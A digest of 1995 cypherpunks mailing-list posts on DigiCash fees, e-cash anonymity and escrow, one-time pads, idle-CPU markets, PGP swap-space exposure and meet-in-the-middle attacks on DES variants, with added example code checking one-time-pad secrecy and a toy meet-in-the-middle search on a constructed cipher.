Subject: Re: rejection of CJR
In-Reply-To: <m0t8Tqi-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <199510262313.TAA01043@nrk.com>
MIME-Version: 1.0
Content-Type: text/plain


> 

> Request for the T-Shirt had been returned and read him the message to
> that effect.
> 
> [Mr. Capilino] told me that that was the wrong address for mail, since
> it was used only for courier deliveries, and that they have stopped
> accepting even courier deliveries there since the Oklahoma city bombing.

try:

Office of Defense Trade Controls 
PM/DTC
Department of State
Washington DC 20522-0602

This goes via the mail facility at Dulles where they DO
screen mail....

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Fri, 27 Oct 1995 11:43:24 +0800
To: gnu@toad.com
Subject: Re: Mark Twain Bank's DigiCash offer
In-Reply-To: <199510262212.PAA19056@comsec.com>
Message-ID: <9510270219.AA29315@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


The two big drawbacks for me in this offer are:

	*  The contract gives them the right to demand that I pay for
	   anything that they spend investigating their "rights,
	   remedies, and security interests".  Not if I sue them.  Not
	   if they win.  ANYTIME.  I could send them email, and get
	   back a bill for the employee time spent answering it.  And
	   I've agreed to pay such bills, if I sign their contract.

> 13. Costs, Expenses and Interest. Customer, on demand from Bank, shall pay
> to Bank all costs and expenses incurred or paid by Bank for any reason in
> connection with this Agreement and relating to protecting, enforcing and
> determining Bank's rights, remedies and security interests, including but
> not limited to, attorneys' fees and costs . . .

	* You pay 4% -- in the BEST deal -- on every transaction.  The
	   high-initial-fee merchant account still charges you 2% on
	   the way in, and 2% on the way out.  You don't even have to
	   spend any of it, you pay for just moving money among your
	   accounts.  If both payer and payee are using one of the
	   low-initial-fee accounts, the total loss could be as much as
	   10%.

There's lots of little drawbacks too.
I sure hope the competition arrives soon.

	John






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Darren New <dnew@sgf.fv.com>
Date: Fri, 27 Oct 1995 11:24:51 +0800
To: Nick Szabo <szabo@netcom.com>
Subject: Re: DigiCash
In-Reply-To: <199510260038.RAA21478@netcom.netcom.com>
Message-ID: <Pine.3.89.9510261924.B613-0100000@sgf.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


> Darren New:
> > If I give you a dollar for an online newspaper and the 
> > newspaper never gets to me, or I give you $50 for a textbook and the 
> > textbook never shows up in the mail weeks later, who do I go to to get my 
> > money back?
> 
> This is a bad-case scenario, since it involves long delay and
> delivery of goods that, unlike information, have a nontrivial
> marginal cost to the merchant. 

Well, the online newspaper is certainly information. 

> * Escrow services, which take responsibility for delivery each
> way (and develop a public reputation for reliably doing this).
> This has the value that it still allows the parties to be mutually
> anonymous (although additional tools are needed to actually
> have strongly anonymous connections, the payment/delivery protocol 
> doesn't preclude it).

If you can do this, then you don't need an anonymous payment system, do
you? If you want to go through a trusted third-party escrow agent and
that agent doesn't know what you're buying, why do you need to hide what
you're spending it on? How is this different from the bank being the 
trusted third party holding your money in escrow anonymously?

If the escrow agent knows who you're buying from and who you're selling
to, you've lost the anonymity. If the escrow agent doesn't know what the 
goods are and doesn't know who is exchanging the goods, then you don't 
need to pay that agent anonymously.

> * Ripped bill protocols might be able to substitute for escrows.
> (these are quite esoteric, but can again be hidden behind a nice
> metaphor).

I still think that at some point, either you have the money before the 
goods or the goods before the money. Basic Byzantine General problem, yes?
In addition, if it's online cash, I have to clear it with the bank before 
I know it's any good. I read the Certified Electronic Mail paper, and 
(while I didn't follow it all) I didn't see how that solved the problem.

> * Deal only with a jurisdictionally reachable merchant and hope the
> law is on your side

And... how do you know? How do you know that the LLBean website that's 
taking your money *is* LLBean?  (Probably TM's in there somewhere.)
I can set up a web site, run it for three days, and walk off with a bunch 
of money, can't I? How can someone distinguish this from LLBean having 
shipping delays?

> (often not an available solution on the global 
> Internet, but usually assumed by identified payment schemes, so
> it's a reasonable fallback from that point of view).

First Virtual assumes that the seller loses in the case of a dispute. 
Bearer instruments assume that the buyer loses in the case of a dispute. 

> For smaller transactions with rapid delivery times, complaining 
> loudly and publicly on Usenet will soon put the business out of it.

That's assuming the business meant to stay in business in the first place.
Ever hear the one where you wheel the fake ATM machine into the mall for
one day? 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 27 Oct 1995 11:47:11 +0800
To: cypherpunks@toad.com
Subject: Re: Mark Twain Bank's DigiCash offer
In-Reply-To: <9510270219.AA29315@toad.com>
Message-ID: <199510270259.TAA03688@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


John Gilmore <gnu@toad.com> writes:
>	* You pay 4% -- in the BEST deal -- on every transaction.  The
>	   high-initial-fee merchant account still charges you 2% on
>	   the way in, and 2% on the way out.  You don't even have to
>	   spend any of it, you pay for just moving money among your
>	   accounts.  If both payer and payee are using one of the
>	   low-initial-fee accounts, the total loss could be as much as
>	   10%.

As far as I can tell there is no charge for moving funds between your
ecash wallet and the "mint" at the bank.  The charges are for moving
between the "mint" and the world access account.  If you had a shop
which was able to pay much of its expenditures in ecash it sounds like
there would be no percentage fee to the bank.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@intuit.com (Mark Chen)
Date: Fri, 27 Oct 1995 12:07:55 +0800
To: corby@pela.intuit.com (Corby Anderson)
Subject: Re: One Time Pad encryption over the Internet, securely? (fwd)
In-Reply-To: <9510262248.AA19876@doom>
Message-ID: <9510270345.AA21918@doom.intuit.com>
MIME-Version: 1.0
Content-Type: text/plain


Corby,

> I *had* to forward this to you.  Can you give him the answer, or are you
> bound by an NDA?  I can't remember.
> 
> Corby

Unfortunately, I am bound by an NDA.

However, I am not violating the NDA by saying that Craig is correct.
There is no way to do a one-time pad except by doing a one-time pad.
In other words, it is not possible to generate synchronized, truly
random key streams at remote locations non-algorithmically.

One-time pads have a property that no other encryption scheme has.  If
I am an attacker and I somehow gain access to all of the key material
and all of the plaintext that two communicating parties have so far
used, I am still unable to decipher the next transmission.  *Only*
one-time pads have this property, and there is no way to achieve it
without negotiating a key stream out of band.

OTPs also have some other properties that are more mathematical in
nature.  For instance, the probability of getting any particular bit
of plaintext from a given ciphertext is equal to the raw probability
of getting that plaintext by itself.  In other words:

   p_P(x_i | c) = p_P(x_i)

where P is the plaintext space, x_i is the plaintext, and c is the
ciphertext.

Furthermore,

   p_K(K) = 1/|K|

which means that all keys are used with equal probability,
irrespective of plaintext and ciphertext.

Hope this helps!

   - Mark -

> Forwarded message:
> > From firewalls-owner@GreatCircle.COM Thu Oct 26 03:39:33 1995
> > X-Delivered: at request of corby on doom
> > X-Authentication-Warning: miles.greatcircle.com: majordom set sender to firewalls-owner using -f
> > From: Craig Bishop <csb@connect.com.au>
> > Message-Id: <199510260745.RAA16385@koromiko.off.connect.com.au>
> > Subject: One Time Pad encryption over the Internet, securely?
> > To: firewalls@greatcircle.com
> > Date: Thu, 26 Oct 1995 17:45:13 +1000 (EST)
> > X-Mailer: ELM [version 2.4 PL21]
> > Mime-Version: 1.0
> > Content-Type: text/plain; charset=US-ASCII
> > Content-Transfer-Encoding: 7bit
> > Sender: firewalls-owner@GreatCircle.COM
> > Precedence: bulk
> > 
> > I was contacted and asked whether I was interested in software which
> > used a one time pad for encryption.
> > 
> > It comes from Elementrix, an Israeli company offering encrypted email,
> > ftp and what they call "personal firewall" software.
> > 
> > This software uses a One Time Pad via a patent pending method. I am no
> > encryption expert and the information available is limited but it would
> > seem to me that there is no way to do this over the internet securely.
> > 
> > See, http://www.elementrix.co.il/
> > 
> > Cheers, Craig
> > 
> > -- 
> > Craig Bishop - Internet Security Analyst
> > csb@connect.com.au
> > http://www.connect.com.au/people/csb/
> > 
> 



--
Mark Chen 
chen@intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D
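
The two properties stated in the message above, p_P(x_i | c) = p_P(x_i) and p_K(K) = 1/|K|, checked exactly on a toy message space. This is an added example, not part of the original message; the 4-bit plaintext prior and the seed-repeating key generator are constructed for illustration.

```python
"""Exact check of the one-time-pad properties p(x|c) = p(x) and p(K) = 1/|K|."""
from fractions import Fraction

BITS = 4  # toy message/key length (assumption for illustration)

# Constructed, deliberately skewed prior over 4-bit plaintexts.
PRIOR = {
    0b0000: Fraction(1, 2),
    0b0001: Fraction(1, 4),
    0b0110: Fraction(1, 8),
    0b1111: Fraction(1, 8),
}


def uniform_keys(bits=BITS):
    """True pad: every key equally likely, p(K) = 1/|K|."""
    n = 1 << bits
    return {k: Fraction(1, n) for k in range(n)}


def seeded_keys():
    """Hypothetical 'algorithmic pad': a 2-bit seed repeated to fill 4 bits.

    Only 4 of the 16 possible keys can ever occur, so p(K) is not 1/|K|.
    """
    return {(s << 2) | s: Fraction(1, 4) for s in range(4)}


def posterior(prior, key_dist, c):
    """Return p(x | c) for c = x XOR k by Bayes' rule, or None if c cannot occur."""
    # For a fixed ciphertext, plaintext x is consistent only with key x ^ c.
    joint = {x: px * key_dist.get(x ^ c, Fraction(0)) for x, px in prior.items()}
    total = sum(joint.values())
    if total == 0:
        return None
    return {x: p / total for x, p in joint.items()}


def is_perfectly_secret(prior, key_dist, bits=BITS):
    """True if no ciphertext that can occur changes the attacker's prior."""
    for c in range(1 << bits):
        post = posterior(prior, key_dist, c)
        if post is not None and post != prior:
            return False
    return True


if __name__ == "__main__":
    print("uniform pad keeps prior:", is_perfectly_secret(PRIOR, uniform_keys()))
    print("seeded pad keeps prior: ", is_perfectly_secret(PRIOR, seeded_keys()))
    # With the seeded generator, seeing c = 0000 rules out two plaintexts.
    for x, p in posterior(PRIOR, seeded_keys(), 0b0000).items():
        print(f"  p(x={x:04b} | c=0000) = {p}   (prior {PRIOR[x]})")
```

With the uniform key distribution every ciphertext leaves the prior untouched; with the seed-expanded keys the ciphertext 0000 raises the probability of plaintext 0000 from 1/2 to 4/5 and eliminates two candidates outright.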




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Fri, 27 Oct 1995 11:57:17 +0800
To: Wei Dai <weidai@eskimo.com>
Subject: Re: idle CPU markets
In-Reply-To: <Pine.SUN.3.91.951026184046.23045A-100000@eskimo.com>
Message-ID: <199510270342.VAA13430@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 An entity calling itself "Wei Dai <weidai@eskimo.com>" allegedly wrote:
>
> What other problems would benefit from easy access to lots of distributed 
> CPU cycles?


Well there are plenty of applications that want lots of cycles, but
there are several problems with the idle CPU market approach to getting
those cycles.



(Examples I can think of:  rendering of movie-quality graphics in
non-real-time, scientific computation/modelling, compiling...)


1.  Many such applications want their computation to be highly 
responsive--  the long turn-around involved in farming your task 
over a WAN is often prohibitive.  (E.g. real-time graphics.)

2.  Also many applications that need this kind of power are highly 
sensitive to inaccuracy or fraud.  A scientific modelling experiment 
which uses zillions of cycles can be rendered completely worthless 
if a tiny calculation that had been farmed to Joe Blow is done wrong 
or is lied about by Joe.

3.  Similarly, many such applications are highly confidential.


I'm sure some cypherpunks have good ideas on how to deal with
problems 3 and maybe 2...



Bryce

signatures follow


            "To strive, to seek, to find and not to yield."   
    <a href="http://ugrad-www.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce@colorado.edu                   </a>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMJBVJvWZSllhfG25AQG5DgP/SL0fcuwTtc140OANZpZZ0jIfiXzyE7/v
0P+vOU1o2sgloAge8drPAo6O3/x92sU1YJFN4QxFLLIpD84vxTjS1XwFAywZqQQu
sn8HcNyTVRyUwjgVm3zd4adyQVBorYNpnreDqAnNPMaB9fDHrWMy+09hFx9JV+/X
nL15ZctEHTI=
=vI1Z
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Fri, 27 Oct 1995 12:10:59 +0800
To: don@cs.byu.edu
Subject: The Unofficial "PGP" Icon / Logo
In-Reply-To: <199510270018.SAA00625@wero.byu.edu>
Message-ID: <199510270353.VAA13851@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 don@cs.byu.edu allegedly wrote:
>
> Oh, by the way, anyone have any cool PGP/crypto icons to Inline into
> my web page? <g>


A few months ago I decided that what the world needed was a friendly-
looking "PGP" icon which we could all display everywhere and which 
would catch people's attention.  I quickly rejected pictures of locks,
chains, safes, keys and so forth as appealing too much to those who
go for tech and tools.  I wanted something that would appeal to my
mom.  I finally settled on a big-pixel ("digital") blue envelope 
with a big "PGP" stamp across the seal.  (Alternately I considered
having the "PGP" stamp in the upper-right-hand-corner "stamp slot",
but this wasn't as fitting a metaphor...)


After shopping around and finding nothing like it available, I sat
down at some stupid Windoze paint program and created one.  It's not
very pretty (I'm a better programmer than graphic artist, I think),
but you can see it/get a copy at 
<a href="http://www-ugrad.cs.colorado.edu/~wilcoxb> The Niche </a>, 
my home page.


I hope someone makes a nicer-looking version soon so I can use it.


Sitting down and trying to draw a nicer-looking PGP icon is on my
(very long) list of Things To Do.  I'm considering scanning a real
envelope and super-imposing the "PGP" stamp digitally, but that
would probably look even uglier...


Regards,

Bryce

signatures follow


            "To strive, to seek, to find and not to yield."   
    <a href="http://ugrad-www.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce@colorado.edu                   </a>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMJBXkfWZSllhfG25AQGebgQAnR7aLOMKYLE6AuJBL46zGkkTrBEpkWhb
hl5uGxctL6NoYL/sGjsPbdU8XrF4sjN7grlh456P9ol2NkUNoHqRfKl53gIpmJBO
N+DA8LktH2V0n+81LfyKx6L2i25tKa/re8gKFSDUZXpMrrfFRt6FQpGvvDtKuPUN
D2G2WAGKTLM=
=4zWl
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 27 Oct 1995 12:44:45 +0800
To: cypherpunks@toad.com
Subject: PIS_tst
Message-ID: <199510270218.WAA25945@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-26-95. Wash Rag:


   "CIA & The Justice Dept. Ground Rules for Disputed
   Territory."

      Officials told the Senate Select Committee on
      Intelligence that the Clinton administration has made
      improving cooperation between the CIA and the Justice
      Department a priority, so they can routinely exchange
      sensitive information on a growing list of topics that
      embrace both domestic and international activities --
      such as terrorism, organized crime, narcotics, alien
      smuggling and arms proliferation.


   PIS_tst  (6 kb)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 27 Oct 1995 12:44:42 +0800
To: cypherpunks@toad.com
Subject: COS_sec
Message-ID: <199510270219.WAA26087@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-23-95. NYPaper:

   "An operating system to keep the wide spaces open while
   providing security. Providing tools to build hangouts in
   cyberspace, protected by encryption." Denise Caruso's
   column.

      Electric Communities began work in 1993 on the
      Cyberspace Operating System, or COS, designed to manage
      the resources of shared computing -- like security and
      bandwidth -- just as operating systems like the
      Macintosh OS or Windows 95 manage resources inside a
      desktop PC. The team is inventing some technology,
      including a programming language (compatible with Sun
      Microsystems' new Java language for Internet
      applications) and a design concept for software building
      blocks which it is in the process of patenting. In
      addition, staff cryptographers are weaving encryption
      throughout the system to make it absolutely secure and
      private.


   COS_sec  (6 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 27 Oct 1995 12:45:26 +0800
To: cypherpunks@toad.com
Subject: SPI_bux
Message-ID: <199510270220.WAA26233@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-22-95, NYPaper:

   "When Spies Look Out For the Almighty Buck."

      "The fact of the matter is that the intelligence
      agencies are the center where all this is put together
      -- the economic, the political and the security
      concerns," said Robert B. Zoellick, a former top State
      Department official who handled much of the economic
      portfolio in the Bush Administration. "And perhaps that
      makes sense, because they should have more detachment
      than the individual economic agencies would."


   "Economic Espionage." Editorial

      The C.I.A. has not made a convincing case why it should
      start from almost no base to build a center for economic
      intelligence and analysis when the Government can hire
      outside experts or look to agencies like the Treasury
      Department that already have more knowledgeable staffs.
      William Casey had many faults as Director of Central
      Intelligence in the Reagan Administration. But he did
      know a thing or two about economics. Whenever he wanted
      economic intelligence, Mr. Casey often said, he would
      ask a businessman, not an intelligence analyst.


   SPI_bux  (14 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 27 Oct 1995 13:45:01 +0800
To: cypherpunks@toad.com
Subject: CAS_bah
Message-ID: <199510270221.WAA26405@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-22-95. NYPaper: 

   "High Stakes, High Tech. Imagine the Internet As Electronic
   Casino."

      Mr. Fields is the former director of Darpa. He now hopes
      to transform the Internet, developed to defeat the
      evil empire, into a powerful medium for indulging
      America's growing weakness for wagering, to bring
      casinos to the people -- and into the center of American
      life, the home.

      "When I was looking around for what I would do next I
      decided to do something in the entertainment and gaming
      industries because they're now the greatest users of
      advanced technologies," Mr. Fields said. "It used to be
      the defense industry."


   CAS_bah  (6 kb)













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rschlafly@attmail.com (Roger  Schlafly)
Date: Fri, 27 Oct 1995 15:30:59 +0800
To: cypherpunks@toad.com
Subject: pub key expert wanted
Message-ID: <rschlafly3000548130>
MIME-Version: 1.0
Content-Type: text/plain



Re: Schlafly v. Public Key Partners & RSA Data Security

I am deposing the inventors, but there are apt to be some loose
ends that I will need to tie down and I may need some expert
testimony.  I'd like to have someone

* with expertise in public key crypto
* with some impressive-sounding credentials
* willing to volunteer to help break some patents

Any suggestions?

Roger Schlafly
rschlafly@attmail.com
phone: 408-476-3550




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephan Somogyi <somogyi@digmedia.com>
Date: Fri, 27 Oct 1995 14:12:41 +0800
To: Wei Dai <cypherpunks@toad.com>
Subject: Re: idle CPU markets
Message-ID: <v03003801acb61db18d2a@[198.93.25.98]>
MIME-Version: 1.0
Content-Type: text/plain


At 18:45 26.10.95, Wei Dai wrote:

> What other problems would benefit from easy access to lots of
> distributed  CPU cycles?

It would be within the capability of smaller animation houses to render
a feature length computer-animated film at high quality without
significant capital equipment expenditure or excessive rental costs.

If the granularity of transaction is per-frame (not unreasonable for a
night's worth of cycles), the evil participant problem is avoidable
since each frame would have to be inspected by a person, and payment
for a correct frame approved by same, before it's integrated into the
film.

_______________________________________________________________________
Stephan Somogyi               Senior Editor               Digital Media






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 27 Oct 1995 15:28:51 +0800
To: cypherpunks@toad.com
Subject: Re: Linux security issues
Message-ID: <199510270552.WAA17904@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  1:23 10/26/95 -0500, Aleph One wrote:
>         I don't see what this has to do with Linux. The question should
>be does the PGP pass phrase ever appear in a swap partition/file.

Actually keeping the pass phrase out of swap space is fairly easy (although
I haven't looked at the PGP code to see if it actually does this).  Read the
pass phrase in raw mode, one character at a time and convert it one
character at a time to the decryption key for the private RSA key.  Then
the OS doesn't need to buffer the whole line, either in kernel space or in
user space.

However, the pass phrase is not the only dangerous information. 
Intermediate forms used for decrypting the RSA private keys, and the
decrypted RSA private keys also have to be protected.  The logic of PGP
requires that it keep at least one of these around for a long time, so it
will probably be written to swap space.

N.B. This problem affects all virtual memory operating systems.  I can
think of the Unix/Linux family, MacOS with virtual memory turned on, and
most mainframe OSs (e.g. IBM's VM/ESA).


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Fri, 27 Oct 1995 11:33:34 +0800
To: Richard.Johnson@Colorado.EDU (Richard Johnson)
Subject: Re: HTTP Request-Header & Server Environment Echoes
In-Reply-To: <v02130500acb55ea73e82@[204.131.233.57]>
Message-ID: <9510262211.AA09165@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


you can add
http://hplyot.obspm.fr:6661/
and
http://hplyot.obspm.fr:8001/

which both show the raw stuff read from your browser
(the first is my anonymous proxy, the latter is an experimental
dynamic server)

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

[Hello to all my fans in domestic surveillance] Kaser Sose terrorist
 radar $400 million in gold Greenpeace genetic




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Fri, 27 Oct 1995 12:11:24 +0800
To: Mark <mark@lochard.com.au>
Subject: Re: Mandatory ID in California?
In-Reply-To: <199510260643.AA26567@junkers.lochard.com.au>
Message-ID: <Pine.SV4.3.91.951026234915.15329H-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


> How about INS coming into the equation?  Do they have additional powers which
> let them put your butt in a bad imitation of a Faraday cage?

   It is well-settled, that the area around the borders is "special" with 
respect to immigration-related enforcement.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpb@miamisci.org (Joe Block)
Date: Fri, 27 Oct 1995 14:18:53 +0800
To: Wei Dai <weidai@eskimo.com>
Subject: Re: idle CPU markets
Message-ID: <v01520c05acb625608f09@[199.227.2.161]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:45 PM 10/26/95, you wrote:

>What other problems would benefit from easy access to lots of distributed
>CPU cycles?

3D Rendering and Physics simulations come immediately to mind.

signoff
2048bit-Fingerprint: 74 64 C7 6F 51 72 36 3D 87 75 F9 F5 2A F6 8F 74
------------------------------------------------------------------------
Help Phil! email zldf@clark.net or see http://www.netresponse.com/zldf






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Bryan <sbryan@maroon.tc.umn.edu> (Steve Bryan)
Date: Fri, 27 Oct 1995 15:13:30 +0800
To: Steven Levy <steven@echonyc.com>
Subject: Re: newsweek oct 30 Levy digital cash article
Message-ID: <v02130500acb6343348e6@[204.221.10.130]>
MIME-Version: 1.0
Content-Type: text/plain


>>also, my question about whether one loses the downloaded Chaumian bucks
>if one's hard drive crashes was answered in the affirmative by Levy.
>
>But as I said, if the drive is backed up you don't lose it. It's my 
>understanding this is the case with the current Digicash/Twain bucks.  
>But not necessarily with all implementations.
>
>This "lose your money" with digital cash really does seem to get to 
>people. I always point out that when you take $ out of an ATM machine, 
>you don't expect to get it back if you lose it.  For those forms of 
>e-money that are irretrievable when lost users are warned not to download 
>huge amounts. 
>
>Question: will people's worries about losing their e-money lead them to 
>accept a higher degree of traceability as a tradeoff?  

I have a question about Digicash that I haven't seen addressed. I've participated in the beta test but have to admit I didn't use it with great frequency. I only downloaded $10 at a time. What surprised me was that one time I was informed that the money I had downloaded had expired. I was able to go back and pick up more but am perplexed with what happened in that case. Does digicash actually age and disappear if not used soon enough?


-Steve Bryan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Lull <lull@acm.org>
Date: Fri, 27 Oct 1995 12:30:13 +0800
To: hallam@w3.org
Subject: Re: MD4-derived hash functions
In-Reply-To: <9510261603.AA26221@zorch.w3.org>
Message-ID: <199510270413.VAA29718@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 26 Oct 1995 12:03:57 -0400, you wrote:

> 3DES with only two independent keys is only slightly more secure than
> DES, consider a variant of the meet in the middle attack exploiting 
> the fact that the constraint network is reducible to two equations
> in one unknown.

I believe you meant 2DES?  I've not heard of a meet in the middle
attack on 2-key 3DES better than brute force of a 112-bit key.

Even for 2DES, or for 3-key 3DES, doesn't a meet in the middle attack
require on the order of 2^56 words of memory?  This, as a practical
matter, makes a brute-force attack much more difficult than it would
appear at first glance.
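
The time/memory trade-off discussed in this exchange, as an added example that is not part of the original message: a meet-in-the-middle search against double encryption with a constructed toy cipher (16-bit block, 16-bit key per stage; toy_enc, mitm and KEYSPACE are names made up for this sketch, not DES). The table holds one entry per first-stage key, so at DES scale it would need on the order of 2^56 entries.

```c
#include <stdint.h>
#include <stdio.h>

#define KEYSPACE 65536   /* 2^16 keys per stage in this toy; single DES has 2^56 */

static uint16_t rotl16(uint16_t x, int r) {           /* r must be 1..15 */
    return (uint16_t)((x << r) | (x >> (16 - r)));
}

/* Toy round function and subkey schedule (constructed, no security value). */
static uint8_t f(uint8_t half, uint8_t sk) {
    uint8_t v = (uint8_t)(half + sk);
    return (uint8_t)(v * 167u + (v >> 3) + 0x5bu);
}
static uint8_t subkey(uint16_t k, int round) {
    return (uint8_t)rotl16(k, 4 * round + 1);
}

/* 4-round Feistel cipher on a 16-bit block with a 16-bit key. */
uint16_t toy_enc(uint16_t k, uint16_t x) {
    uint8_t l = (uint8_t)(x >> 8), r = (uint8_t)x;
    for (int i = 0; i < 4; i++) {
        uint8_t t = (uint8_t)(l ^ f(r, subkey(k, i)));
        l = r; r = t;
    }
    return (uint16_t)((l << 8) | r);
}
uint16_t toy_dec(uint16_t k, uint16_t y) {
    uint8_t l = (uint8_t)(y >> 8), r = (uint8_t)y;
    for (int i = 3; i >= 0; i--) {                    /* rounds in reverse order */
        uint8_t t = (uint8_t)(r ^ f(l, subkey(k, i)));
        r = l; l = t;
    }
    return (uint16_t)((l << 8) | r);
}
uint16_t double_enc(uint16_t k1, uint16_t k2, uint16_t x) {
    return toy_enc(k2, toy_enc(k1, x));
}

/* Chained table: head[m] is the first k1 with toy_enc(k1, pt[0]) == m. */
static int32_t head[KEYSPACE], next_k1[KEYSPACE];

/* Returns the number of key pairs consistent with every (pt[i], ct[i]);
   the first one found is stored in *k1, *k2. *ops counts cipher calls. */
long mitm(const uint16_t *pt, const uint16_t *ct, int n,
          uint16_t *k1, uint16_t *k2, unsigned long *ops) {
    long found = 0;
    *ops = 0;
    for (long m = 0; m < KEYSPACE; m++) head[m] = -1;
    /* Forward half: one table entry per k1. This is the memory cost. */
    for (long a = 0; a < KEYSPACE; a++) {
        uint16_t mid = toy_enc((uint16_t)a, pt[0]);
        next_k1[a] = head[mid];
        head[mid] = (int32_t)a;
        (*ops)++;
    }
    /* Backward half: decrypt under each k2 and look up the middle value. */
    for (long b = 0; b < KEYSPACE; b++) {
        uint16_t mid = toy_dec((uint16_t)b, ct[0]);
        (*ops)++;
        for (int32_t a = head[mid]; a >= 0; a = next_k1[a]) {
            int ok = 1;              /* extra pairs filter out false matches */
            for (int i = 1; i < n && ok; i++) {
                ok = double_enc((uint16_t)a, (uint16_t)b, pt[i]) == ct[i];
                *ops += 2;
            }
            if (ok && found++ == 0) { *k1 = (uint16_t)a; *k2 = (uint16_t)b; }
        }
    }
    return found;
}

int main(void) {
    const uint16_t pt[3] = {0x1234, 0xabcd, 0x0f0f};  /* constructed known plaintexts */
    uint16_t ct[3], k1 = 0, k2 = 0;
    unsigned long ops;
    for (int i = 0; i < 3; i++) ct[i] = double_enc(0xbeef, 0x1337, pt[i]);
    long n = mitm(pt, ct, 3, &k1, &k2, &ops);
    printf("%ld consistent key pair(s), first k1=%04x k2=%04x\n",
           n, (unsigned)k1, (unsigned)k2);
    printf("table entries: %d, cipher calls: %lu (exhaustive search: up to 2^32)\n",
           KEYSPACE, ops);
    return 0;
}
```

The work drops from about 2^32 double encryptions to a few times 2^16 cipher calls, but only because the 2^16-entry table fits in memory; that table is the cost the message above points at.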





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Campbell <edge@got.net>
Date: Fri, 27 Oct 1995 21:18:56 +0800
To: cypherpunks@toad.com
Subject: Re: idle CPU markets
Message-ID: <199510271321.GAA21142@you.got.net>
MIME-Version: 1.0
Content-Type: text/plain


>1.  Many such applications want their computation to be highly 
>responsive--  the long turn-around involved in farming your task 
>over a WAN is often prohibitive.  (E.g. real-time graphics.)

Use the right tool for the right job. Cycle sales are useless for most
applications, and forcing a square peg into a round peg will only result in
frustration. There are a gazillion useful outlets for this technology,
though - more pop up all the time. The latest I heard today was OCR .tiff ->
.txt conversion, where the payee can afford (cpu-wise) to toggle all the
settings to the highest (slowest) quality.

>2.  Also many applications that need this kind of power are highly 
>sensitive to inaccuracy or fraud.  A scientific modelling experiment 
>which uses zillions of cycles can be rendered completely worthless 
>if a tiny calculation that had been farmed to Joe Blow is done wrong 
>or is lied about by Joe.

Voting - send the same data to 3+ unrelated machines (if you can afford
redundancy) and accept the 'majority opinion'.

Sanity checking - depends on the algorithms in question; may require human
intervention in many cases, where errors (accidental or not) may not be
easily machine-recognizable.

... just to name a couple off the top of my head.

>3.  Similarly, many such applications are highly confidential.

This is the easy one :) That is to say, solutions to this problem are
already being implemented for other applications.
--
   Jay Campbell                edge@got.net - Operations Manager
